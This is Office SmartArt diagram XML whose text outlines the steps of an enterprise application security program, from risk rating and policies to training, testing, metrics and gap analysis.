    <dgm:cxn modelId="{A9C19672-C679-460C-9FE3-F6008C0FDA2E}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" srcOrd="2" destOrd="0" parTransId="{78BDE72E-320A-45A2-9C00-71C161400527}" sibTransId="{48C4FD2A-4FFD-49E2-8C3B-E8FB5C35EE2E}"/>
    <dgm:cxn modelId="{C5605201-BEB4-41FF-9CCA-DF2A45C5DFDF}" type="presOf" srcId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" destId="{573CF2CD-94C3-4404-8E22-47B8390B5477}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3CB2FCAA-845B-4E77-96F8-BD65A4482C86}" type="presOf" srcId="{0527E629-D6A1-4D08-92A0-442047772A1B}" destId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5BCE37A6-D490-402E-BED7-B266D56B4D42}" srcId="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" destId="{0527E629-D6A1-4D08-92A0-442047772A1B}" srcOrd="0" destOrd="0" parTransId="{DE30B842-5C00-46E7-924F-4ED4BCAC119F}" sibTransId="{61BE0B0A-057E-4602-B5F4-5CE5CF26BCAA}"/>
    <dgm:cxn modelId="{334DC799-7F06-4DE0-B65E-858F23C9C051}" type="presOf" srcId="{35005AD2-355F-4221-AFBE-62EE5EE8EED6}" destId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DDC2C771-D18B-4F81-9A8C-9226D30F1A3B}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{39F11DF5-92F1-4803-9176-8CE41A00F711}" srcOrd="0" destOrd="0" parTransId="{6A80C258-8448-4B2A-A29D-75B427DB2E14}" sibTransId="{0AC1C748-C2BF-49EE-BEA2-E40FA789A0EA}"/>
    <dgm:cxn modelId="{A44D59C0-5D98-464F-B60C-25E8AFDF711B}" type="presOf" srcId="{E9B37935-A190-492F-89CA-C506985D7367}" destId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F7B73C40-DD58-41F7-94EB-D126F6E5D054}" srcId="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" destId="{41C02D83-CEEC-4620-A615-8B5A4D00B738}" srcOrd="0" destOrd="0" parTransId="{5B8401E1-D1AE-4822-A27B-6C7F36490558}" sibTransId="{963C0D22-4492-41AE-A9A3-1E59F83BC07A}"/>
    <dgm:cxn modelId="{FF984803-01A1-483E-9882-3F0F64F97DA6}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B29B22A2-3156-48F5-A350-963380660B24}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" srcOrd="1" destOrd="0" parTransId="{C44C12F1-0403-475A-AE8F-FC6620291395}" sibTransId="{C6F93B38-475D-4104-A89D-89CE58E7B1DF}"/>
    <dgm:cxn modelId="{C3B02C87-CF23-4459-BC77-4340884D47FB}" type="presOf" srcId="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" destId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1703B8A6-2E16-4791-8CF7-7496BB71C34E}" type="presOf" srcId="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" destId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5C00C635-0F15-48BA-863D-D766E0512A86}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ECB962F4-F8EE-4EBA-960E-80C08190CE71}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BBC8A82D-00AA-43F9-98DE-C119BF44648F}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1B137561-844F-47B9-8185-0B14BBCCCEB8}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E4C47624-4900-4769-90AE-860385474EF1}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{EA798A97-C42B-452A-B443-1F8731C07995}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AB23E0C4-1176-48D6-A18D-F9FF39A53F8B}" type="presParOf" srcId="{EA798A97-C42B-452A-B443-1F8731C07995}" destId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DFCAFD26-A5A6-40E5-9FE8-67DCE8818AB2}" type="presParOf" srcId="{EA798A97-C42B-452A-B443-1F8731C07995}" destId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2FEE4C90-2E47-4C69-B471-6982C8291AC1}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{0F8CEA5E-4B37-490B-9AE0-CDA5F17BE6F0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EBD290FF-66CC-4F53-9571-BFBC41476774}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F1F9F12B-BD08-4607-AD96-21C930A3DAB4}" type="presParOf" srcId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" destId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{34FF66E3-AF8A-4E37-8764-4380AB4C6B8A}" type="presParOf" srcId="{676F7A36-6AAA-4955-A57F-DD1BC987CD57}" destId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B9320F6C-53E8-4A69-9821-D5D2EC2120F3}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{DD358220-5785-4B23-978F-F4E2C7042D8B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0E73A611-9255-44F4-A958-A9FA7185FBBA}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6C0C01E8-A86F-4893-B603-07EA86554255}" type="presParOf" srcId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" destId="{3DD3F871-F853-40F1-B9BB-E34640B0706D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1947D27E-73ED-4905-8CE0-30D51DEF2392}" type="presParOf" srcId="{D8F94A04-35D0-4E45-AB1C-3F08328A87D4}" destId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D853633B-724F-4DCB-892F-85581CF66CA7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{FBFB702B-7982-4C7E-A93C-B997F1F67BF5}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8CCF2746-79B4-490F-96F2-14F4798D3BA6}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E207F69D-514C-43B6-9BA3-B0E05E9BC855}" type="presParOf" srcId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" destId="{573CF2CD-94C3-4404-8E22-47B8390B5477}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CBB732C4-78B8-4A9A-9C1C-73BBA8467CA0}" type="presParOf" srcId="{24991520-C7CD-4F47-AA25-966865CCD1DF}" destId="{8CBD60D3-72A4-4313-88D7-1B4D28AA9E08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
            <a:t>Get Started</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>application security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> and drive adoption. </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smtClean="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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Identify and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>prioritize your application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> from an inherent risk perspective.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9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>common risk rating model</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" type="parTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6249606A-E44B-456D-8550-331FDC0465D3}" type="sibTrans" cxnId="{6010088D-1046-466A-BB02-8A55CE262380}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish a set of focused </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>policies and standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Define a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId5"/>
            </a:rPr>
            <a:t>common set of reusable security controls</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> 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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>application security training curriculum</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> that is required and targeted to different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smtClean="0"/>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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Define and integrate </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>security implementation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>verification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> activities into existing development and operational processes.  Activities include </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>Threat Modeling</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Secure Design &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Secure Code &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>Review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>Pen Testing</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>, Remediation, etc.</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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Provide subject matter experts and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>support services for development and project teams</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>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dirty="0" smtClean="0"/>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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Manage with metrics.  Drive improvement and funding decisions based on the metrics and analysis data captured.  Metrics include adherence to security practices / activities, vulnerabilities introduced, vulenerabilities mitigated, application coverage,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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.</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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Conduct </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>your peers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t> to </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>define </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>key </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>improvement areas and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>an execution </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>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dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Gain </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t>management approval and establish an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>application security awareness </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>campaign</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0"/>
            <a:t> for the entire IT </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>organization.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>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168F1251-0689-442A-B8FC-0A781112776D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
            <a:t>Create an application risk profiling model to measure and prioritize the applications in your portfolio.  Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" type="parTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}" type="sibTrans" cxnId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E7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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>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en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{23A55926-6632-4C49-BE69-326A87E18CBC}" type="presOf" srcId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26ABB8A4-2126-4601-8276-CB099BFB0770}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" srcOrd="1" destOrd="0" parTransId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" sibTransId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}"/>
    <dgm:cxn modelId="{4D4901AE-986B-4432-9DC1-4E0F95A75C0C}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{85EDB1E7-A378-4F0C-B0F9-C3AC2705555F}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{86012D62-A2D0-4619-82DE-82E2DAD81915}" type="presOf" srcId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}"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43FBE940-8BFA-4EF5-A55D-083FACE306D9}" type="presOf" srcId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2D4DB1DF-DBCD-4FE0-B938-0EEDA5949E76}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{168F1251-0689-442A-B8FC-0A781112776D}" srcOrd="1" destOrd="0" parTransId="{48643092-65B8-42CE-8E35-AA9211C4F6F6}" sibTransId="{2A16CAF8-C7C7-4B9C-A977-34CB2964E0E1}"/>
    <dgm:cxn modelId="{D95EFEA5-B61A-4A2C-8A7A-18669C2814B8}" type="presOf" srcId="{168F1251-0689-442A-B8FC-0A781112776D}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9B1E24C1-9646-4B11-BED2-E864AE96290B}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{572A4DD0-8BB0-43D8-A35E-9D4C730E38B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7CE23833-C39B-44CF-88AA-5E5F3CB77A73}" type="presOf" srcId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}"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F5234BFB-0653-49D4-A393-2589918EFE10}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}"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FC62C5B-88D3-46E0-A53E-57D4877596DC}" type="presOf" srcId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
